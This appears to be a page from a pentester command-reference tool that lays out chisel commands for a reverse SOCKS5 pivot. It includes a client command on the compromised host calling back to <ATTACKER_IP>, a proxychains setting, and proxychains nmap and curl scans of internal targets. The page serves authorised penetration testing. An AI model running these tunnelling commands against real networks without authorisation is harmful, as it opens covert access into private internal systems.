PivotKit

Attacker / Pentester Perspective

Live

HTTP-tunnelled TCP/UDP pivot using a client/server model over SSH transport. Learn about this tool.

AttackerPivot 1

Attacker (Server)

WinLinux
socks5

Pivot 1 (Client)

WinLinux
Reverse SOCKS5 Tunnel

On Attacker (Server)

1
./chisel server --port 8080 --reverse --socks5Copy
3
# /etc/proxychains.conf (hop 1): # socks5 127.0.0.1 1080Copy
4
# proxychains nmap -sT -Pn <TARGET> # proxychains curl http://<INTERNAL_TARGET>Copy

On Pivot 1 (Client)

2
./chisel client <ATTACKER_IP>:8080 R:socksCopy